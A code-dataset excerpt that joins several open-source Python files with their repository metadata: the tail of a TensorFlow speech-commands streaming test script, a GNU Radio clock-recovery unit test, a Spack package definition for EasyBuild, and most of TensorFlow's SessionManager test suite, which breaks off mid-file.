input_data.save_wav_file(FLAGS.output_audio_file, output_audio,
FLAGS.sample_rate)
tf.compat.v1.logging.info('Saved streaming test wav to %s',
FLAGS.output_audio_file)
with open(FLAGS.output_labels_file, 'w') as f:
for output_label in output_labels:
f.write('%s, %f\n' % (output_label['label'], output_label['time']))
tf.compat.v1.logging.info('Saved streaming test labels to %s',
FLAGS.output_labels_file)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_url',
type=str,
# pylint: disable=line-too-long
default='https://storage.googleapis.com/download.tensorflow.org/data/speech_commands_v0.01.tar.gz',
# pylint: enable=line-too-long
help='Location of speech training data')
parser.add_argument(
'--data_dir',
type=str,
default='/tmp/speech_dataset',
help="""\
Where to download the speech training data to.
""")
parser.add_argument(
'--background_dir',
type=str,
default='',
help="""\
Path to a directory of .wav files to mix in as background noise during training.
""")
parser.add_argument(
'--background_volume',
type=float,
default=0.1,
help="""\
How loud the background noise should be, between 0 and 1.
""")
parser.add_argument(
'--background_frequency',
type=float,
default=0.8,
help="""\
How many of the training samples have background noise mixed in.
""")
parser.add_argument(
'--silence_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be silence.
""")
parser.add_argument(
'--testing_percentage',
type=int,
default=10,
help='What percentage of wavs to use as a test set.')
parser.add_argument(
'--validation_percentage',
type=int,
default=10,
help='What percentage of wavs to use as a validation set.')
parser.add_argument(
'--sample_rate',
type=int,
default=16000,
help='Expected sample rate of the wavs.',)
parser.add_argument(
'--clip_duration_ms',
type=int,
default=1000,
help='Expected duration in milliseconds of the wavs.',)
parser.add_argument(
'--window_size_ms',
type=float,
default=30.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--window_stride_ms',
type=float,
default=10.0,
help='How long the stride is between spectrogram timeslices',)
parser.add_argument(
'--feature_bin_count',
type=int,
default=40,
help='How many bins to use for the MFCC fingerprint',
)
parser.add_argument(
'--wanted_words',
type=str,
default='yes,no,up,down,left,right,on,off,stop,go',
help='Words to use (others will be added to an unknown label)',)
parser.add_argument(
'--output_audio_file',
type=str,
default='/tmp/speech_commands_train/streaming_test.wav',
help='File to save the generated test audio to.')
parser.add_argument(
'--output_labels_file',
type=str,
default='/tmp/speech_commands_train/streaming_test_labels.txt',
help='File to save the generated test labels to.')
parser.add_argument(
'--test_duration_seconds',
type=int,
default=600,
help='How long the generated test audio file should be.',)
parser.add_argument(
'--word_gap_ms',
type=int,
default=2000,
help='How long the average gap should be between words.',)
parser.add_argument(
'--unknown_percentage',
type=int,
default=30,
help='What percentage of words should be unknown.')
FLAGS, unparsed = parser.parse_known_args()
tf.compat.v1.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
apache-2.0
|
pothosware/gnuradio
|
gr-digital/python/digital/qa_clock_recovery_mm.py
|
45
|
5378
|
#!/usr/bin/env python
#
# Copyright 2011-2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import random
import cmath
from gnuradio import gr, gr_unittest, digital, blocks
class test_clock_recovery_mm(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test01(self):
# Test complex/complex version
omega = 2
gain_omega = 0.001
mu = 0.5
gain_mu = 0.01
omega_rel_lim = 0.001
self.test = digital.clock_recovery_mm_cc(omega, gain_omega,
mu, gain_mu,
omega_rel_lim)
data = 100*[complex(1, 1),]
self.src = blocks.vector_source_c(data, False)
self.snk = blocks.vector_sink_c()
self.tb.connect(self.src, self.test, self.snk)
self.tb.run()
expected_result = 100*[complex(0.99972, 0.99972)] # doesn't quite get to 1.0
dst_data = self.snk.data()
# Only compare last Ncmp samples
Ncmp = 30
len_e = len(expected_result)
len_d = len(dst_data)
expected_result = expected_result[len_e - Ncmp:]
dst_data = dst_data[len_d - Ncmp:]
#print expected_result
#print dst_data
self.assertComplexTuplesAlmostEqual(expected_result, dst_data, 5)
def test02(self):
# Test float/float version
omega = 2
gain_omega = 0.01
mu = 0.5
gain_mu = 0.01
omega_rel_lim = 0.001
self.test = digital.clock_recovery_mm_ff(omega, gain_omega,
mu, gain_mu,
omega_rel_lim)
data = 100*[1,]
self.src = blocks.vector_source_f(data, False)
self.snk = blocks.vector_sink_f()
self.tb.connect(self.src, self.test, self.snk)
self.tb.run()
expected_result = 100*[0.9997, ] # doesn't quite get to 1.0
dst_data = self.snk.data()
# Only compare last Ncmp samples
Ncmp = 30
len_e = len(expected_result)
len_d = len(dst_data)
expected_result = expected_result[len_e - Ncmp:]
dst_data = dst_data[len_d - Ncmp:]
#print expected_result
#print dst_data
self.assertFloatTuplesAlmostEqual(expected_result, dst_data, 4)
def test03(self):
# Test complex/complex version with varying input
omega = 2
gain_omega = 0.01
mu = 0.25
gain_mu = 0.01
omega_rel_lim = 0.0001
self.test = digital.clock_recovery_mm_cc(omega, gain_omega,
mu, gain_mu,
omega_rel_lim)
data = 1000*[complex(1, 1), complex(1, 1), complex(-1, -1), complex(-1, -1)]
self.src = blocks.vector_source_c(data, False)
self.snk = blocks.vector_sink_c()
self.tb.connect(self.src, self.test, self.snk)
self.tb.run()
expected_result = 1000*[complex(-1.2, -1.2), complex(1.2, 1.2)]
dst_data = self.snk.data()
# Only compare last Ncmp samples
Ncmp = 100
len_e = len(expected_result)
len_d = len(dst_data)
expected_result = expected_result[len_e - Ncmp:]
dst_data = dst_data[len_d - Ncmp:]
#print expected_result
#print dst_data
self.assertComplexTuplesAlmostEqual(expected_result, dst_data, 1)
def test04(self):
# Test float/float version
omega = 2
gain_omega = 0.01
mu = 0.25
gain_mu = 0.1
omega_rel_lim = 0.001
self.test = digital.clock_recovery_mm_ff(omega, gain_omega,
mu, gain_mu,
omega_rel_lim)
data = 1000*[1, 1, -1, -1]
self.src = blocks.vector_source_f(data, False)
self.snk = blocks.vector_sink_f()
self.tb.connect(self.src, self.test, self.snk)
self.tb.run()
expected_result = 1000*[-1.2, 1.2]
dst_data = self.snk.data()
# Only compare last Ncmp samples
Ncmp = 100
len_e = len(expected_result)
len_d = len(dst_data)
expected_result = expected_result[len_e - Ncmp:]
dst_data = dst_data[len_d - Ncmp:]
#print expected_result
#print dst_data
self.assertFloatTuplesAlmostEqual(expected_result, dst_data, 1)
if __name__ == '__main__':
gr_unittest.run(test_clock_recovery_mm, "test_clock_recovery_mm.xml")
|
gpl-3.0
|
TheTimmy/spack
|
var/spack/repos/builtin/packages/easybuild/package.py
|
3
|
1703
|
##############################################################################
# Copyright (c) 2017, Kenneth Hoste
#
# This file is part of Spack.
# Created by Kenneth Hoste, [email protected]
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Easybuild(PythonPackage):
"""EasyBuild is a software build and installation framework
for (scientific) software on HPC systems.
"""
homepage = 'http://hpcugent.github.io/easybuild/'
url = 'https://pypi.io/packages/source/e/easybuild/easybuild-3.1.2.tar.gz'
version('3.1.2', 'c2d901c2a71f51b24890fa69c3a46383')
depends_on('[email protected]', when='@3.1.2', type='run')
depends_on('[email protected]', when='@3.1.2', type='run')
depends_on('[email protected]', when='@3.1.2', type='run')
|
lgpl-2.1
|
apark263/tensorflow
|
tensorflow/python/training/session_manager_test.py
|
11
|
33665
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SessionManager."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_manager
class SessionManagerTest(test.TestCase):
def testPrepareSessionSucceeds(self):
with ops.Graph().as_default():
v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session(
"", init_op=variables.global_variables_initializer())
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFeedDict(self):
with ops.Graph().as_default():
p = array_ops.placeholder(dtypes.float32, shape=(3,))
v = variables.VariableV1(p, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session(
"",
init_op=variables.global_variables_initializer(),
init_feed_dict={p: [1.0, 2.0, 3.0]})
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFn(self):
with ops.Graph().as_default():
v = variables.VariableV1([125], name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session(
"", init_fn=lambda sess: sess.run(v.initializer))
self.assertAllClose([125], sess.run(v))
@test_util.run_v1_only("b/120545219")
def testPrepareSessionFails(self):
checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
try:
gfile.DeleteRecursively(checkpoint_dir)
gfile.DeleteRecursively(checkpoint_dir2)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
sess = sm.prepare_session(
"",
init_op=variables.global_variables_initializer(),
saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
checkpoint_filename = os.path.join(checkpoint_dir,
"prepare_session_checkpoint")
saver.save(sess, checkpoint_filename)
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
# Renames the checkpoint directory.
os.rename(checkpoint_dir, checkpoint_dir2)
gfile.MakeDirs(checkpoint_dir)
v = variables.VariableV1([6.0, 7.0, 8.0], name="v")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
# This should fail as there's no checkpoint within 2 seconds.
with self.assertRaisesRegexp(
RuntimeError, "no init_op or init_fn or local_init_op was given"):
sess = sm.prepare_session(
"",
init_op=None,
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True,
max_wait_secs=2)
# Rename the checkpoint directory back.
gfile.DeleteRecursively(checkpoint_dir)
os.rename(checkpoint_dir2, checkpoint_dir)
# This should succeed as there's checkpoint.
sess = sm.prepare_session(
"",
init_op=None,
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True,
max_wait_secs=2)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
def _test_recovered_variable(self,
checkpoint_dir=None,
checkpoint_filename_with_path=None):
# Create a new Graph and SessionManager and recover from a checkpoint.
with ops.Graph().as_default():
v = variables.VariableV1(2, name="v")
with session_lib.Session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
sess, initialized = sm2.recover_session(
"",
saver=saver,
checkpoint_dir=checkpoint_dir,
checkpoint_filename_with_path=checkpoint_filename_with_path)
self.assertTrue(initialized)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
@test_util.run_v1_only("b/120545219")
def testRecoverSession(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
try:
gfile.DeleteRecursively(checkpoint_dir)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess,
os.path.join(checkpoint_dir, "recover_session_checkpoint"))
self._test_recovered_variable(checkpoint_dir=checkpoint_dir)
self._test_recovered_variable(
checkpoint_filename_with_path=checkpoint_management.latest_checkpoint(
checkpoint_dir))
# Cannot set both checkpoint_dir and checkpoint_filename_with_path.
with self.assertRaises(ValueError):
self._test_recovered_variable(
checkpoint_dir=checkpoint_dir,
checkpoint_filename_with_path=checkpoint_management.latest_checkpoint(
checkpoint_dir))
@test_util.run_v1_only("b/120545219")
def testWaitForSessionReturnsNoneAfterTimeout(self):
with ops.Graph().as_default():
variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
recovery_wait_secs=1)
# Set max_wait_secs to allow us to try a few times.
with self.assertRaises(errors.DeadlineExceededError):
sm.wait_for_session(master="", max_wait_secs=3)
def testInitWithNoneLocalInitOpError(self):
# Creating a SessionManager with a None local_init_op but
# non-None ready_for_local_init_op raises ValueError
with self.assertRaisesRegexp(ValueError,
"If you pass a ready_for_local_init_op "
"you must also pass a local_init_op "):
session_manager.SessionManager(
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=None)
@test_util.run_v1_only("b/120545219")
def testRecoverSessionWithReadyForLocalInitOp(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(),
"recover_session_ready_for_local_init")
try:
gfile.DeleteRecursively(checkpoint_dir)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess,
os.path.join(checkpoint_dir, "recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
v = variables.VariableV1(2, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=w.initializer)
saver = saver_lib.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
@test_util.run_v1_only("b/120545219")
def testRecoverSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
# We use ready_for_local_init_op=tf.report_uninitialized_variables(),
# which causes recover_session to not run local_init_op, and to return
# initialized=False
# Create a checkpoint.
checkpoint_dir = os.path.join(
self.get_temp_dir(),
"recover_session_ready_for_local_init_fails_to_ready_local")
try:
gfile.DeleteRecursively(checkpoint_dir)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
saver = saver_lib.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess,
os.path.join(checkpoint_dir, "recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
v = variables.VariableV1(2, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(),
local_init_op=w.initializer)
saver = saver_lib.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
False,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
@test_util.run_v1_only("b/120545219")
def testRecoverSessionNoChkptStillRunsLocalInitOp(self):
# This test checks for backwards compatibility.
# In particular, we continue to ensure that recover_session will execute
# local_init_op exactly once, regardless of whether the session was
# successfully recovered.
with ops.Graph().as_default():
w = variables.VariableV1(
1,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
# Try to recover session from None
sess, initialized = sm2.recover_session(
"", saver=None, checkpoint_dir=None)
# Succeeds because recover_session still run local_init_op
self.assertFalse(initialized)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEquals(1, sess.run(w))
@test_util.run_v1_only("b/120545219")
def testRecoverSessionFailsStillRunsLocalInitOp(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(
self.get_temp_dir(),
"recover_session_ready_for_local_init_fails_stil_run")
try:
gfile.DeleteRecursively(checkpoint_dir)
except errors.OpError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
# Create a new Graph and SessionManager and recover.
with ops.Graph().as_default():
v = variables.VariableV1(2, name="v")
w = variables.VariableV1(
1,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
saver = saver_lib.Saver({"v": v})
sess, initialized = sm2.recover_session(
"",
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=False)
self.assertFalse(initialized)
self.assertEqual(
False,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEquals(1, sess.run(w))
@test_util.run_v1_only("b/120545219")
def testWaitForSessionLocalInit(self):
server = server_lib.Server.create_local_server()
with ops.Graph().as_default() as graph:
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = session_manager.SessionManager(
graph=graph,
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=w.initializer)
# Initialize v but not w
s = session_lib.Session(server.target, graph=graph)
s.run(v.initializer)
sess = sm.wait_for_session(server.target, max_wait_secs=3)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testWaitForSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
with ops.Graph().as_default() as graph:
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = session_manager.SessionManager(
graph=graph,
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(),
local_init_op=w.initializer)
with self.assertRaises(errors_impl.DeadlineExceededError):
# Time-out because w fails to be initialized,
# because of overly restrictive ready_for_local_init_op
sm.wait_for_session("", max_wait_secs=3)
@test_util.run_v1_only("b/120545219")
def testWaitForSessionInsufficientReadyForLocalInitCheck(self):
with ops.Graph().as_default() as graph:
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = session_manager.SessionManager(
graph=graph,
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
with self.assertRaisesRegexp(errors_impl.DeadlineExceededError,
"Session was not ready after waiting.*"):
sm.wait_for_session("", max_wait_secs=3)
@test_util.run_v1_only("b/120545219")
def testPrepareSessionWithReadyForLocalInitOp(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
x = variables.VariableV1(
3 * v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="x")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
self.assertEqual(False, variables.is_variable_initialized(x).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=[w.initializer, x.initializer])
sess = sm2.prepare_session("", init_op=v.initializer)
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("x:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
self.assertEquals(3, sess.run(x))
@test_util.run_v1_only("b/120545219")
def testPrepareSessionWithPartialInitOp(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
x = variables.VariableV1(
3 * v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="x")
# TODO(b/70206927): Use ResourceVariables once they are handled properly.
v_res = variables.VariableV1(1, name="v_res")
w_res = variables.VariableV1(
v_res,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w_res")
x_res = variables.VariableV1(
3 * v_res,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="x_res")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
self.assertEqual(False, variables.is_variable_initialized(x).eval())
self.assertEqual(False, variables.is_variable_initialized(v_res).eval())
self.assertEqual(False, variables.is_variable_initialized(w_res).eval())
self.assertEqual(False, variables.is_variable_initialized(x_res).eval())
sm2 = session_manager.SessionManager(local_init_op=[
w.initializer, x.initializer, w_res.initializer, x_res.initializer
])
sess = sm2.prepare_session("", init_op=None)
self.assertEqual(
False,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("x:0")).eval(session=sess))
self.assertEquals(1, sess.run(w))
self.assertEquals(3, sess.run(x))
self.assertEqual(
False,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v_res:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("w_res:0")).eval(session=sess))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("x_res:0")).eval(session=sess))
self.assertEquals(1, sess.run(w_res))
self.assertEquals(3, sess.run(x_res))
@test_util.run_v1_only("b/120545219")
def testPrepareSessionWithCyclicInitializer(self):
# Regression test. Previously Variable._build_initializer_expr would enter
# into an infinite recursion when the variable's initial_value involved
# cyclic dependencies.
with ops.Graph().as_default():
i = control_flow_ops.while_loop(lambda i: i < 1, lambda i: i + 1, [0])
v = variables.VariableV1(array_ops.identity(i), name="v")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
sm = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
sess = sm.prepare_session("", init_op=v.initializer)
self.assertEqual(1, sess.run(v))
self.assertEqual(
True,
variables.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
def testPrepareSessionDidNotInitLocalVariable(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
with self.assertRaisesRegexp(
RuntimeError, "Init operations did not make model ready.*"):
sm2.prepare_session("", init_op=v.initializer)
def testPrepareSessionDidNotInitLocalVariableList(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables())
with self.assertRaisesRegexp(RuntimeError,
"Init operations did not make model ready"):
sm2.prepare_session("", init_op=[v.initializer])
def testPrepareSessionWithReadyNotReadyForLocal(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=variables.report_uninitialized_variables(
variables.global_variables()),
local_init_op=w.initializer)
with self.assertRaisesRegexp(
RuntimeError,
"Init operations did not make model ready for local_init"):
sm2.prepare_session("", init_op=None)
@test_util.run_v1_only("b/120545219")
def testPrepareSessionWithInsufficientReadyForLocalInitCheck(self):
with ops.Graph().as_default():
v = variables.VariableV1(1, name="v")
w = variables.VariableV1(
v,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.cached_session():
self.assertEqual(False, variables.is_variable_initialized(v).eval())
self.assertEqual(False, variables.is_variable_initialized(w).eval())
sm2 = session_manager.SessionManager(
ready_op=variables.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
with self.assertRaisesRegexp(RuntimeError,
"Init operations did not make model ready.*"):
sm2.prepare_session("", init_op=None)
class ObsoleteSessionManagerTest(test.TestCase):
def testPrepareSessionSucceeds(self):
with ops.Graph().as_default():
v = variables.VariableV1([1.0, 2.0, 3.0], name="v")
sm = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
sess = sm.prepare_session(
"", init_op=variables.global_variables_initializer())
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFeedDict(self):
with ops.Graph().as_default():
p = array_ops.placeholder(dtypes.float32, shape=(3,))
v = variables.VariableV1(p, name="v")
sm = session_manager.SessionManager(
ready_op=variables.assert_variables_initialized())
sess = sm.prepare_session(
"",
init_op=variables.global_variables_initializer(),
init_feed_dict={p: [1.0, 2.0, 3.0]})
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFn(self):
with ops.Graph().as_default():
v = variables.VariableV1([125], name="v")
